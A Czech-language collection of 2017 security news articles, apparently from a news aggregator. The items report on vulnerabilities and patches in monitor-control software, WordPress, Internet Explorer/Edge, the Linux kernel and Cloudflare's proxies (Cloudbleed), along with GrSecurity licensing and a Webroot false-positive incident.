Na vážnou zranitelnost týkající se monitorů, kvůli čemuž jsou v ohrožení milióny počítačů, upozornil český Národní bezpečnostní tým CSIRT.CZ, který je provozován sdružením CZ.NIC.

„Byla identifikována bezpečnostní chyba v softwaru vyvinutém společností Portrait Displays, jejíž produkty využívá řada velkých výrobců, jako jsou Sony, HP, Acer, Fujitsu, Philips, Dell, Benq, Lenovo, Sharp a Toshiba,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ.

Hlavní problém je v tom, že na ovládací software společnosti Portrait Displays spoléhá tak velké množství výrobců. Právě proto je teoreticky v ohrožení tolik uživatelů. Žádné zneužití uvedené chyby však zatím bezpečnostní experti nezaznamenali.

Mohou převzít kontrolu nad napadeným strojem
„Společnost Portrait Displays, označila chybu, umožňující přihlášenému útočníkovi spustit libovolný kód a eskalovat systémová oprávnění, jako kritickou,“ konstatoval Bašta.

Podle něj mohou zneužít zranitelný software počítačoví piráti například k tomu, aby na napadeném stroji otočili obraz nebo změnili nastavení barev. Kromě těchto na první pohled neškodných vtípků ale bezpečnostní trhlinu mohou zneužít v krajním případě také k tomu, že převezmou kontrolu nad napadeným počítačem.

S ohledem na možná rizika by se tak uživatelé měli ze stránek jednotlivých výrobců stáhnout nejnovější aktualizace ovládacího softwaru, pokud jsou totiž k dispozici. Společnost Portrait Displays již totiž záplatu objevené chyby pro výrobce monitorů uvolnila.

Bezpečnostní záplaty GrSecurity už nebudou k dispozici zdarma
27.4.2017 Root.cz Zranitelnosti
Brad Spengler oznámil, že bezpečnostní jaderné patche GrSecurity a PaX už nebudou nadále k dispozici zdarma. Dostanou se k nim jen platící zákazníci. Nyní je na komunitě, aby udržovala staré verze či je vyvíjela.
Projekt GrSecurity oznámil, že přestává vydávat veřejné testovací patche pro linuxové jádro a nadále se bude soustředit jen na platící zákazníky. S okamžitou platností byl veškerý kód z veřejného úložiště odstraněn a jádro 4.9 bylo schválně zvoleno jako poslední podporované veřejně dostupnými kód. Jedná se o LTS verzi jádra s prodlouženou podporou, takže uživatelé by měli mít dost času se změně přizpůsobit. K dispozici už nebudou ani žádné veřejné verze bezpečnostního rozšíření PaX.

Vývojář Brad Spengler se prý chce zaměřit na novou generaci bezpečnostních mechanizmů, které ochrání uživatele před moderními hrozbami. V oznámení o změně (+ FAQ) konkrétně zmiňuje zaměření na ARM64, Android, podporu RAP do stabilních jader, KERNSEAL, STRUCTGUARD a další moderní obranné mechanismy proti data-only útokům.

Stávajících platících zákazníků se prý změna nijak nedotkne, pokud je některá firma závislá na již neexistujících veřejných -test repozitářích, měla by se nově stát platícím zákazníkem. Ti pak budou mít přístup k -beta repozitářům s kódem pro nejnovější jádra.

Pro ostatní je tu špatná zpráva: žádné alternativní řešení podle Spenglera neexistuje. Linuxová komunita v posledních dvaceti letech selhala v investicích do bezpečnosti. Také proto tu není žádná přímá alternativa nebo jen možnost získat jiným způsobem alespoň část vlastností GrSecurity, píše se v oznámení, které odkazuje také na porovnání vlastností existujících linuxových bezpečnostních projektů.

Díky licenci GNU GPL 2 je tu samozřejmě šance, že linuxová komunita převezme doposud zveřejněné záplaty a někdo je bude udržovat a podporovat novější jádra. Sám autor to ale nechce dělat a odmítá staré verze zveřejňovat, prý proto, aby uživatele nepodporoval v používání starých nebezpečných jader. Zároveň upozorňuje na to, že název GrSecurity je chráněn registrovanou ochrannou známkou, takže pokud někdo bude nadále s kódem nakládat, musí tak činit pod jiným jménem.

GrSecurity je sada patchů pro linuxové jádro, které výrazně zvyšují bezpečnost systému a odolnost proti útokům. Existuje od roku 2001 a už téměř deset let ho Brad Spengler vyvíjí pod hlavičkou své společnosti Open Source Security, Inc. GrSecurity a PaX byly vždy velmi průkopnické projekty a jako první například do linuxového jádra přinesly podporu ASLR.

Brad Spengler je dlouhodobě nespokojený s tím, že jeho úpravy nebyly dobře přijímány v linuxové komunitě a jen malá část se dostala do jádra. Hlavním problémem vždy bylo, že se jedná o jeden obrovský nečleněný patch, jehož kvalita se navíc nelíbila Linusovi. Ten některé změny neváhal označit za „šílené“.

Proto se vývojáři rozhodli vytvářet svůj kód odděleně od jádra a dávat vývojové verze zdarma. Mnoho firem podle nich začalo patche používat, ale jen malá část byla ochotna zaplatit. Proto se autor už před dvěma lety rozhodl dodávat stabilní patche jen platícím zákazníkům. Nyní bylo toto omezení rozšířeno na veškerý kód, včetně testovacího.

Otázkou zůstává, zda je takový postup v souladu se zněním licence GNU GPL v2, pod kterou je vydáno linuxové jádro. Richard Stallman se už před časem vyjádřil v tom smyslu, že je takové jednání v rozporu s licencí. GrSecurity je modifikací kódu šířeného pod GNU GPL, ale autor se snaží bránit uživatelům ve sdílení výsledku, který musí být také pod stejnou licencí dostupný.

Kritická chyba umožňuje přístup k systému skrz ovládací aplikace monitorů
26.4.2017 Živě.cz Zranitelnosti
Bezpečnostní experti společnosti SEC Consult informovali o kritické zranitelnosti aplikace, kterou vyvíjí Portrait Displays a využívá ji mnoho výrobců monitorů – Sony, HP, Acer, Fujitsu, Philips, Dell, Benq, Lenovo, Sharp či Toshiba. V případě zneužití je možné v systému vytvářet nové uživatele, měnit jejich oprávnění či měnit uživatelské skupiny.

Antivirová společnost omylem označila jako malware systémové soubory. Zákazníkům se zhroutily Windows
Podle SEC Consult se chyba týká primárně aplikací DisplayView od Fujitsu a Display Assistant, která je určena pro monitory HP. Není však vyloučeno ani postižení dalších aplikací výše zmíněných výrobců. Vývojáři z Portrait Displays urychleně vydali opravný patch, nyní jej však v rámci aktualizací musí implementovat jednotliví výrobci, kteří platformu pro svůj software využívají.

K uživatelům by se měla oprava dostat v rámci automatických aktualizací, které umožňuje například Fujitsu. V opačném případě ale mohou být uživatelé ohroženi – jen málokdo bude ručně aktualizovat ovládací software k monitoru.

Pokud vám tedy na stole stojí monitor Fujitsu či HP a zároveň máte nainstalovanou ovládací aplikaci, rozhodně se porozhlédněte po bezpečnostních updatech.

Antivirová společnost omylem označila jako malware systémové soubory. Zákazníkům se zhroutily Windows
26.4.2017 Živě.cz Zranitelnosti
Antivirový výrobce Webroot v těchto dnech řeší nepříjemnou kauzu, které jistě ve skrytu duše děsí úplně všichni z oboru. Bezpečnostní program totiž před několika hodinami chybně označil zcela korektní soubory jako malware a zablokoval je. Jedná se tedy o klasický případ false-positive.

Kdyby se jednalo o pár osobních souborů z uživatelské složky, asi by o nic nešlo a uživatel by soubory prostě odstranil z trezoru, v tomto případě však Webroot zablokoval třeba systémové soubory vývojové verze Windows z programu Insider Preview. To v praxi vedlo k tomu, že systém havaroval a přirozeně odmítal nastartovat.

Sledovat
Neil Jackson @Jaxxnet
Webroot seem to have angered a lot of their customers.... the system is in utter meltdown after borking legit system and app files. Ooops.
00:56, 25. Apr. 2017
3 3 retweety 1 1 lajk
Některým dalším zákazníkům pak podle Ars Techniky program podobným způsobem zablokoval některé podnikové aplikace. Webroot nyní musí ožehavou kauzu urychleně vyřešit, jeho marketingové oddělení ale bude průšvih řešit asi ještě docela dlouho.

Sledovat
iSupportU @isupportu
@Webroot everything is breaking, money is flying out the window... where are you? I have been on hold 20+min
01:20, 25. Apr. 2017
retweetů lajků
Sledovat
Pat Moore @DueMarauder
@Webroot What's the scoop on this false positive issue that has crippled a quarter of my customers?
00:30, 25. Apr. 2017
retweetů lajků

Microsoft vydal opravný balík pro Creators Update. Řeší i potíže s režimem Connected Standby

26.4.2017 Cnews.cz Zranitelnosti
Záplatovací úterý ještě není, nová hlavní verze Windows 10 ale potřebuje opravit.

Kdo už přešel na Windows 10 Creators Update, mohla se mu už včera večer nebo dnes ráno zobrazit výzva k restartování zařízení. Microsoft totiž uvolnil balík oprav a pokračuje v nastolené tradici, kdy čerstvé vydání Windows 10 nezískává aktualizace jen jednou do měsíce, ale častěji. Včerejší aktualizace nese označení KB4016240 a číslo sestavení zdvihá na 15063.250.

Neobsahuje nové záplaty, jen ladí nahlášené chyby:

Virtuální počítače mohly zaznamenat ztrátu konektivity v síti při nastavování adres IP.
Při používání RemoteRing Configuration Service Provider nedocházelo ke vzdálenému vyzvánění.
Mohlo dojít k úniku paměti v Internet Exploreru, pokud byla otevřena stránka s vloženými rámy, kde dochází k načítání obsahu z více různých domén.
Internet Explorer 11 neuložil javascriptové soubory při exportu do MHT.
Mohlo dojít k odhlášení ve webových aplikacích.
Integrovaná obrazovka zařízení měla jas nastaven na velmi nízkou úroveň. Dělo se to, pokud byla při startu počítače použita jen externí obrazovka a pak jste režim zobrazení přepnuli jen na integrovanou obrazovku.
Hraní aplikací či her pro prostředí Win32 a Direct3D v celoobrazovkovém režimu způsobovalo, že se systém nemusel probudit z režimu Connected Standby.
V edici Professional a vyšších nebylo možné pomocí Editoru místních zásad skupiny vypnout zamykací obrazovku.
Kvůli chybě v konfiguraci knihoven Windows Forms mohly antivirové programy přestat fungovat při spuštění počítače.
Bylo vyřešeno pár problémů s kompatibilitou v Internet Exploreru a Edgi.

Velká aktualizace pro Windows 10 vyjde 11. dubna

31.3.2017 Novinky/Bezpečnost Zranitelnosti
Dlouho očekávanou aktualizaci operačního systému Windows 10, která přinese řadu nových funkcí, vydá společnost Microsoft 11. dubna. Zástupci amerického počítačového gigantu to potvrdili ve středu.
Vydání aktualizace známé jako Creators update chystali vývojáři Microsoftu několik posledních měsíců. Kdy přesně ji vydají však doposud jisté nebylo, přestože již dříve se objevily spekulace, že se tak stane v průběhu dubna. Nyní je již jasné, že se tak stane v úterý 11. dubna.

Jak již samotný název napovídá, s updatem se americký softwarový gigant zaměří především na kreativce. „Aktualizace je navržena tak, aby podpořila kreativitu a pomohla uskutečnit vaše nápady pomocí nástrojů, které budou od 11. dubna nedílnou součástí Windows 10,“ lákají na nové funkce zástupci Microsoftu.

3D technologie a hráči
Americký softwarový gigant se s novou aktualizací zaměří především na dovednosti operačního systému Windows 10 v oblasti 3D technologií. Například malování bude přepracováno tak, aby v něm bylo možné snadno vytvářet trojrozměrné objekty. Kreativních nástrojů ale bude samozřejmě k dispozici daleko více.

Pozornost byla v aktualizaci věnována také hráčům. Své zápolení s protivníky budou uživatelé moci například snadno streamovat na internet. Jednoduše by mělo být možné vytvářet turnaje, a to doslova na pár kliknutí. Turnaje bude možné vytvářet prostřednictvím funkce Arena. V ní si uživatelé nastaví vlastní pravidla a určí, kdo přesně může hrát.

Další vylepšení by se měla týkat prohlížeče Microsoft Edge. A stranou nezůstane ani oblast zabezpečení a ochrany soukromí.

Druhá velká aktualizace
Server Ars Technica upozornil na to, že Microsoft chystá na letošní rok kromě Creators updatu ještě další velkou aktualizaci. Redaktoři se totiž dostali k plánům amerického podniku, ze kterých to jednoznačně vyplývá.

Přesné datum sice uvedeno nebylo, z plánů je však patrné, že by update měl být uvolněn během letošního podzimu. Otazník však visí nad tím, jaké nové vychytávky by měla druhé velká aktualizace přinést.

S nebezpečnými chybami se roztrhl pytel. Záplatuje Microsoft, Adobe i VMware

16.3.2017 Novinky/Bezpečnost Zranitelnosti
Velkou pozornost by v tomto týdnu měli věnovat uživatelé počítačů bezpečnostním aktualizacím. Opravy nebezpečných trhlin totiž vydalo hned několik velkých společností – například Microsoft, Adobe a VMware.
Jako první vydala v úterý aktualizace hned pro několik svých produktů společnost Microsoft. Její pracovníci museli řešit chyby v samotném operačním systému Windows, stejně jako v kancelářském balíku Office i webových prohlížečích Edge a Internet Explorer.

Hned několik trhlin přitom dostalo nálepku „kritická“. To jinými slovy znamená, že tyto chyby představují pro uživatele nejvyšší možné nebezpečí.

Kritické chyby mohou počítačoví piráti zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

Další zranitelnosti, které byly objeveny v aplikacích amerického softwarového gigantu, mají nálepku „důležité“. Ty slouží především ke zlepšení funkčnosti samotného systému, ale například také kancelářského balíku Office. Důležité záplaty by neměly pro uživatele představovat žádné velké bezpečnostní riziko.

Microsoft není jediný
Kritické zranitelnosti ve svých produktech ohlásila také společnost Adobe. Konkrétně se jedná o populární program Flash Player, který slouží k přehrávání videí na internetu a po celém světě jej používají stovky miliónů lidí, a o aplikaci Shockwave Player.

I tyto nebezpečné trhliny mohou počítačoví piráti zneužít k získání kontroly nad napadeným systémem.

A v podstatě totéž platí také pro virtualizační software Workstation a Fusion od společnosti VMWare. Také v případě těchto programů museli tvůrci vydat opravy, které zamezí záškodníkům v přístupu do operačního systému.

S instalací neotálet
S ohledem na možná rizika doporučují bezpečnostní experti s instalacemi opravných balíčků neotálet. „Doporučujeme aktualizovat co nejdříve,“ prohlásil Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Stahovat aktualizace je u programů všech dotčených společností možné prostřednictvím automatických updatů. V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, mohou opravy stáhnout přímo ze stránek jednotlivých výrobců.

Whatsapp obsahoval díru, která umožňovala snadný přístup k fotografiím i soukromým chatům
15.3.2017 Živě.cz Zranitelnosti

Webová verze oblíbeného komunikátoru Whatsapp obsahovala zranitelnost, která umožňovala útočníkům převzít kontrolu nad účtem oběti, stáhnout veškeré fotografie nebo si přečíst kompletní historii konverzací. Podobně potom mohli být napadeni také uživatelé komunikátoru Telegram. Informovali o tom bezpečnostní analytici společnosti Check Point.

Chybu útočníci mohli zneužít v případě kteréhokoliv uživatele, který pro komunikaci používal webové rozhraní. Škodlivý kód zabalili do souboru, který se tvářil jako obyčejná fotografie, po rozkliknutí však došlo k využití lokálních dat prohlížeče pro převzetí kontroly nad účtem. Útočníci mohli zneužít především dvou mechanismů, které komunikátor využíval. Prvním z nich jsou náhledy známých souborů jako jsou dokumenty, fotky, ale i webové stránky, jež se zobrazují v konverzaci. Soubor HTML tak může obsahovat libovolný kód, nicméně v náhledu může Whatsapp zobrazit pouze fotografii.

Druhým problémem potom bylo šifrování zprávy před odesláním, které zamezilo možné kontrole odesílaných souborů na straně WhatsApp. To však bylo velmi rychle napraveno a aplikace nyní kontrolují bezpečnost souborů ještě před jejich odesláním.

V případě aplikace Telegram bylo zneužití velmi podobné, analytici Check Pointu jej demonstrovali na odeslání „zábavného“ videa. Pokud na něj oběť kliknula, opět došlo k přesměrování na soubor, který dokázal využít lokálně uložená data pro převzetí kontroly nad účtem.

Jak WhatsApp tak Telegram díry v systému zalepili a útok tohoto typu by tak uživatelům aktuálně neměl hrozit.

Nebezpečnou chybu má Internet Explorer i Edge. Záplata chybí

2.3.2017 Novinky/Bezpečnost Zranitelnosti
Národní bezpečnostní tým CSIRT.CZ varoval před chybou, která se týká webových prohlížečů Internet Explorer a Edge. Ta představuje pro uživatele velké riziko především proto, že zatím není k dispozici oprava. Útočníci ji mohou poměrně snadno zneužít.
Trhlina byla objevena v rámci programu Project Zero od společnosti Google. V rámci něj vývojáři pravidelně upozorňují na chyby, které jsou pro uživatele velmi nebezpečné.

Paradoxně tímto krokem ale počítačoví piráti získali návod, jak mohou zranitelnost zneužít. „Google Project Zero zveřejnil zranitelnost v prohlížečích Edge a Internet Explorer včetně části kódu umožňující ověřit existenci této chyby,“ řekl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Mohou spustit libovolný kód
„Učinil tak po uplynutí standardní lhůty 90 dní, během níž má výrobce čas na vytvoření záplaty. Zranitelnost má označení CVE-2017-0037 a jejím zneužitím lze způsobit chybu v prohlížeči vedoucí k jeho pádu,“ konstatoval Bašta.

Podle něj nicméně může mít zranitelnost daleko větší dopad na uživatele, než by se mohlo na první pohled zdát. „V detailech zranitelnosti se uvádí i možnost spuštění libovolného kódu,“ zdůraznil bezpečnostní expert.

Kdy bude záplata? Zatím se neví...
Podobné kritické chyby se u jednotlivých programů objevují vcelku pravidelně – a to nejen u těch od amerického softwarového gigantu. Zpravidla však o nich jednotlivé společnosti informují až ve chvíli, kdy je pro ně k dispozici odpovídající záplata. Tedy až poté, kdy se mohou uživatelé bránit.

To však v tuto chvíli v případě zranitelnosti prohlížečů Edge a Internet Explorer neplatí. Microsoft zatím neinformoval ani o tom, kdy by měla vyjít aktualizace opravující trhlinu.

Z bezpečnostních důvodů je tak aktuálně vhodnější používat k procházení webových stránek nějaký konkurenční prohlížeč.

WordPress měl kritickou chybu, přes milion webů napadli hackeři

2.3.2017 Novinky/Bezpečnost Zranitelnosti
Provozovatel populárního redakčního systému sice obratem vydal opravu, ne všichni jeho uživatelé ale mají nastaveny automatické aktualizace.
Více než milión internetových stránek, které využívají publikační systém WordPress, se stalo terčem hackerských útoků poté, co se začátkem února v tomto systému objevila kritická chyba.

Provozovatel platformy sice obratem vydal novou verzi 4.7.2, mnoho uživatelů však nemá zapnuty automatické aktualizace systému a bez ručního schválení bezpečnostní záplaty jsou jejich weby nadále zranitelné a snadno napadnutelné.

„Dva dny po vydání opravy jsme si všimli výrazného nárůstu útoků,“ řekl serveru Infosecurity-magazine.com Mark Maunderovi, ředitel společnosti WordFence, dodavatele stejnojmenného bezpečnostního pluginu pro WordPress. „Útoky pokračovaly a 6. února jsme zaznamenali novou variantu útoku, která obcházela naše bezpečnostní řešení a využívala chyb ve firewallu jiných dodavatelů,“ dodal.

Hackeři mezi sebou soutěžili, kolik webů „položí“
Kritická chyba aktivovala neobvyklé množství hackerů, kteří mezi sebou začali soutěžit, kolik internetových stránek fungujících na WordPressu poškodí. „Za pouhých 48 hodin jsme zaznamenali přes 800 tisíc útoků využívajících této konkrétní zranitelnosti WordPressu,“ uvedl šéf společnosti WordFence.

Někteří hackeři dokonce napadali již poškozené stránky a měnili je ke svému obrazu, aby zvýšili počet úspěšných zásahů. WordFence zaznamenal případ jediného hackera s přezdívkou MuhmadEmad, který úspěšně zaútočil na 350 tisíc webů využívajících WordPress.

„Jde o jednu z nejhorších zranitelností WordPressu v historii,“ konstatuje šéf WordFence. „Intenzivně pracujeme na tom, abychom pomohli uživatelům této platformy, ale pokud si neaktualizují WordPress na poslední verzi a nevyužívají dostatečně silný firewall, nedokážeme je ochránit,“ dodal.

WordPress je mezi hackery všeobecně oblíbený, protože má velmi široké uplatnění. Ze všech používaných systémů pro správu obsahu na internetu má největší podíl na trhu, celosvětově na něm funguje šest z deseti webů.

WordPress je oblíbeným cílem útoků
Ruku v ruce s oblíbeností této publikační platformy ale roste i zájem hackerů. Podle loňského průzkumu společnosti Sucuri, který se zaměřil na infikované stránky na internetu, byly tři čtvrtiny z více než 11 tisíc analyzovaných webů napadeny díky chybě ve WordPressu.

„Základním bezpečnostním pravidlem při používání publikačních systémů a systémů pro správu obsahu je jejich pravidelná a pokud možno bezodkladná aktualizace. Rozhodně se vyplatí mít zapnutou automatickou aktualizaci,“ říká Miroslav Dvořák, technický ředitel společnosti ESET.

Uživatelé by podle Dvořáka měli používat i kvalitní a prověřená bezpečnostní řešení, která je ochrání před škodlivými kódy. „Spoléhat na to, že jednou za čas ručně zaktualizujete systém, protože vám v něm už delší dobu svítí červené upozornění, že používáte zastaralé verze, je opravdu krátkozraké,“ dodává Dvořák.

Linuxové distribuce obsahují vážnou chybu. Její odhalení trvalo 11 let
28.2.2017 Živě.cz Zranitelnosti

Bezpečnostní expert Googlu Andrey Konovalov odhalil v jádru Linuxu kritickou bezpečnostní chybu, která by útočníkům umožnila získat administrátorské (root) oprávnění. V systémech byla přítomna minimálně jedenáct let. Na hrozbu upozornil Bleeping Computer.

Zranitelnost označena jako CVE-2017-6074 byla potvrzena v linuxových jádrech od verze 2.6.18, která byla uvolněna ještě v září 2006. Vážné problémy způsobila nevhodná implementace protokolu Datagram Congestion Control Protocol (DCCP) sloužícího především na ochranu před přetížením datové sítě.

Konovalov totiž našel způsob, kterým může zneužít protokol DCCP pro vytvoření takzvané double free chyby. Jde o bezpečnostní hrozbu, ke které dochází v případě, kdy aplikace uvolní stejnou adresu v paměti dvakrát. V cílených případech umožňuje tato chyba spuštění škodlivého kódu s nejvyššími oprávněními v jádru systému

Chybu nelze zneužít prostřednictvím vzdáleného přístupu přes internet. Experti se však shodují, že může být kombinována s jinými zranitelnostmi, což může v konečném důsledku otevřít hackerům dveře do cílového systému.

Už je opraveno, stahujte záplaty

Na hrozbu byli řádně upozorněni všichni vývojáři jednotlivých linuxových distribucí. Mezi ohrožená linuxová jádra patří ta, která byla kompilovaná s funkcí CONFIG_IP_DCCP.

Vývojáři Red Hat Linuxu ve svém prohlášení uvedli, že systémy Red Hat Enterprise Linux 5, 6, 7 a Red Hat Enterprise MRG 2 obsahují uvedenou chybu. Odpovídající záplaty však byly průběžně vytvořeny a již jsou dostupné ke stažení.

Podobná situace vládne i v případě distribucí Debian. Bezpečnostní aktualizace jsou dostupné pro Debian 7 Wheezy a Debian 8 Jessie. Záplaty jsou rovněž k dispozici i pro distribuci Ubuntu 12.04 LTS, Ubuntu 14.04 LTS, Ubuntu 16.04 LTS a Ubuntu 16.10.

Ubuntu má novou oficiální odnož Budgie, zaujmout chce hlavně designem
Z distribucí SUSE Linux se chyba týká pouze verze SUSE Linux Enterprise Server 10, přičemž jsou aktualizace dostupné pouze pro zákazníky programu LTSS (Long Term Service Pack Support). Jádra systémů SUSE Linux Enterprise Server 11 SP 1 až 4 a SUSE Linux Enterprise Server 12 SP 1 až 2 nejsou sestaveny s podporou protokolu DCCP.

Funkční prototyp škodlivého kódu bude zveřejněn v průběhu několika dnů. Uživatelé tak mají pouze omezenou dobu pro nezbytnou aktualizaci svých systémů.

Čtenářům proto doporučujeme, aby zkontrolovali dostupnost aktualizací pro svoji linuxovou distribuci. V případě, že je váš systém zranitelný a oficiální záplata není zveřejněna, pomůže jednoduchý skript , kterým zakážete spouštění DCCP protokolu.

Kdyby účty neměly správcovská oprávnění, skrze 93 % nalezených děr ve Windows 10 by se nedalo úspěšně útočit

27.2.2017 cnews.cz Zranitelnosti
Díry byly, jsou a budou. Zabezpečení by ale výrazně prospělo, kdybychom nepoužívali uživatelské účty se zbytečně vysokými oprávněními. Aspoň díry nalezené v loňském roce ve Windows na správcovská oprávnění opravdu doplácí.

Používání práv správce bylo vždycky kritizováno v případech, kdy práva uživatel či uživatelka reálně nepotřebuje. Pakliže je účet se zvýšenými právy napaden, může takový útok způsobit pěknou paseku v počítači. Jenže historie ukázala, že koncept oprávnění je patrně příliš složitý. Ve skutečnosti většinu lidí nezajímá, jakými právy disponují, resp. reptají, když pocítí omezení účtu bez správcovských práv.

Vysoká oprávnění znamenají náchylnost k úspěšným útokům

Že by ale bezpečnosti prospělo, kdyby se vysoké oprávnění nepoužívalo zbytečně často, potvrzuje bezpečnostní firma Avecto. Ta ve svém výzkumu provedla analýzu bezpečnostních výstrah, které Microsoft v roce 2016 zveřejnil. Nahlášeno bylo 530 zranitelných míst v produktech redmondského giganta, přičemž 36 % z nich bylo označeno za kritické. Za velice důležité zjištění považuji, že by tyto díry z velké části nemusely znamenat problém.

V 94 % případů ze všech kritických zranitelných míst by mohlo být úspěšnému útoku předejito, kdyby uživatelský účet neměl nastavena správcovská práva. Loni to podle firmy platilo pro 85 % kritických děr. Tím spíše je nutné doporučit, abychom nepoužívali účty se zvýšeným oprávněním, pokud to není nezbytně nutné, protože tím výrazně zvyšujeme šanci úspěšného útoku na naše počítače. Bylo by také dobré vědět, jak správcovská oprávnění ovlivňují nekritická místa v zabezpečení s nižším hodnocením závažnosti. To bohužel Avecto neuvedlo.

Pokud je to možné, používejte raději běžný typ účtu
Edge a Windows 10

Patrně ještě zajímavější je zjištění, že 100 % všech objevených zranitelných míst v Edgi či Internet Exploreru, tedy nejen těch kritických, k úspěšnému útoku vyžaduje správcovská oprávnění. Běžné účty by tak loni skrze uvedené prohlížeče nebylo možné napadnout ani v jednom případě.

Konkrétně ve Windows 10 bylo za celý rok nahlášeno 395 zranitelných míst, což je o 46 % více než v případě Windows 8 a Windows 8.1. (Obě verze Osmiček obsahovaly 265 děr.) To dává smysl, protože Osmičky jsou starší a více odladěné, na trhu se pak současně nachází více verzí Desítek a vzhledem k neustálému vývoji bude v Desítkách zkrátka počet objevených zranitelných míst vždycky vyšší než v případě roky ustáleného kódu.

Loňské útoky na Edge by nebyly ničivé, kdyby byly používány standardní účty
Důležitější je, jak se firma s dírami vypořádá. Nás v tuto chvíli ale více zajímá zjištění podobné dvěma výsledkům výše. Pro 93 % nalezených děr ve Windows 10 platí, že by útok skrze tyto díry nebyl úspěšný, kdyby uživatelské účty nedisponovaly správcovským oprávněním. Opět se správcovské oprávnění ukazuje jako koulí u nohy, aspoň z pohledu bezpečnostních expertek a expertů.

Avecto se podívalo také na Office, kde však uvedlo jen základní statistiku. V produktech rodiny Office bylo loni nahlášeno 79 zranitelných míst. Před rokem to bylo 62 a oproti roku 2014 to představuje již 295% nárůst. Opět předpokládám, že za to může dynamický vývoj Office dostupného v rámci předplatného Office 365. Nevíme však, kolik děr je závislých na účtech se správcovými oprávněními.

Cloudbleed: únik dat sdíleného proxy serveru
27.2.2017 Root.cz Zranitelnosti

Společnost Cloudflare oznámila chybu ve své infrastruktuře, jejíž následky jsou velmi podobné zranitelnosti Heartbleed v OpenSSL. Díky podrobné zprávě o incidentu si můžeme přečíst, co se přesně stalo.
Začalo to celé nenápadně, v pátek 17. února odpoledne, kdy bezpečnostní výzkumník z Google, Tavis Ormandy, napsal na Twitter status, který předznamenával něco velkého.

Během analýzy výsledků tzv. fuzzingu, tedy testování kódu velkou množinou různých vstupů, narazil na podivný webový obsah, který obsahoval evidentně kusy neinicializované paměti. Záhy se ukázalo, že problém je v proxy serverech služby Cloudflare. Když se mu ho podařilo izolovat a reprodukovat, snažil se jej co nejrychleji předat bezpečnostnímu týmu Cloudflare.

Tavis Ormandy
Ukázka uniklých dat – data známé aplikace Uber
První pomoc
Bezpečnostní tým Cloudflare okamžitě pochopil, že jde o vážnou situaci. První, co udělal, bylo vypnutí doplňkových služeb, které nejspíše problém způsobovaly. Konkrétně šlo o služby obfuskace e-mailových adres, server-side excludes a automatických přepisů odkazů z http na https. Podle zprávy o incidentu byly také okamžitě sestaveny týmy pro řešení incidentu – jeden v San Franciscu a druhý v Londýně tak, aby se mohly střídat po 12hodinových směnách v nepřetržitém provozu. K vypnutí e-mailové obfuskace, která způsobovala nejvíce úniků, došlo už 47 minut po nahlášení, ke kompletnímu vypnutí všech funkcí, které únik způsobovaly, došlo 7 hodin po nahlášení.

Hledání příčiny
Od začátku bylo zřejmé, že chyba je ve funkcích, které v proxy serverech za běhu upravují HTML kód stránek. K tomuto účelu v Cloudflare dlouho používali vlastní parser napsaný v jazyce Ragel. Před časem však došli k závěru, že tento kód je příliš složitý a těžko udržovatelný, a tak začali vyvíjet nový, cf-html. Oba parsery jsou provedeny jako moduly pro webový server NGINX a během přechodného období jsou aktivní oba.

Další vyšetřování ukázalo, že chyba byla ve starém kódu přítomna mnoho let, teprve kombinace s novým modulem ji však dokázala vyvolat. Přímou příčinou byla nedostatečná kontrola přetečení ukazatele za konec řetězce v kódu, generovaném kompilátorem jazyka Ragel:

/* generated code */
if ( ++p == pe )
goto _test_eof;
Je třeba zdůraznit, že nejde o chybu v kompilátoru jazyka Ragel, ale o chybu ve zdrojovém kódu v tomto jazyce, jehož autorem je Cloudflare.

Podmínka ve výše uvedeném kódu kontroluje pouze rovnost s koncovou zarážkou. Dojde-li z nějakého důvodu k přeskočení ukazatele za zarážku, není konec vstupu detekován a program čte z paměti bezprostředně následující za bufferem. V této paměti se mohou nacházet různá data z předchozích komunikací. Jelikož je infrastruktura Cloudflare sdílená mezi různými zákazníky, je možné získat data i jiných webových stránek, než těch, které jsou problémem postiženy. Princip čtení přes hranice alokované paměti je velmi podobný chybě Heartbleed z roku 2014.

Tavis Ormandy
Ukázka uniklých dat – data fitness náramku Fitbit
Spící zranitelnost
Chyba čtení za hranice byla v kódu přítomna nejspíše od samého počátku. K jejímu vyvolání došlo vyvoláním chyby parseru na samém konci posledního bufferu, například, když HTML kód na zdrojovém serveru končil takovouto neukončenou značkou:

K prvnímu nasazení cf-html došlo 22. září 2016, kdy byla do cf-html zmigrována funkce automatického přepisování http na https. Zákazníci, kteří měli tuto funkci zapnutou a zároveň splnili podmínku nevalidně ukončeného HTML, mohli způsobovat únik dat už od té doby. Tato funkce však není podle slov Cloudflare příliš používaná.

Dalším nasazením cf-html byla funkce Server-Side Excludes, k jejíž migraci došlo 30. ledna 2017. Tato funkce je však aktivována pouze pro IP adresy se špatnou reputací a slouží k filtrování potenciálně citlivých údajů. Pro běžný provoz se neprojeví. Největší vliv tak měla zatím poslední ze série migrací, která proběhla 13. února, tedy pouhých pár dní před zjištěním incidentu. Jednalo se o migraci funkce obfuskace e-mailových adres, která je naopak používána velmi často.

Identifikace poškození
Cloudflare provozuje pro různé úrovně zpracování webového obsahu samostatné instance webserveru NGINX. Proces, ve kterém byla chyba, je součástí zpracování HTML a je zcela oddělen od procesů terminace TLS, rekomprese obrázků a kešování. Je tedy jisté, že touto zranitelností nemohlo dojít ke kompromitaci privátních klíčů od zákaznických certifikátů. Mohlo však dojít k vyzrazení šifrovacích klíčů, kterými Cloudflare šifruje komunikaci mezi jednotlivými servery v rámci datacentra. Toto šifrování bylo zavedeno v reakci na informace Edwarda Snowdena o masivním monitorování.

Největším problémem ale je únik částí HTTP komunikace jiných zákazníků, kteří používali stejný proxy server. Taková komunikace může obsahovat uživatelská jména a hesla, nebo přinejmenším cookie sezení, které je možné zneužít ke kompromitaci cizích identit.

Zamořené keše
Zásadním problémem také je, že k vyvolání úniku dat nebyla zapotřebí (na rozdíl třeba od Heartbleedu) žádná sofistikovaná činnost, stačilo pouze stahovat webové stránky. To je činnost, která je bezpochyby nejčastější internetovou aktivitou vůbec a kromě koncových uživatelů ji provádějí automaticky nejrůznější roboti.

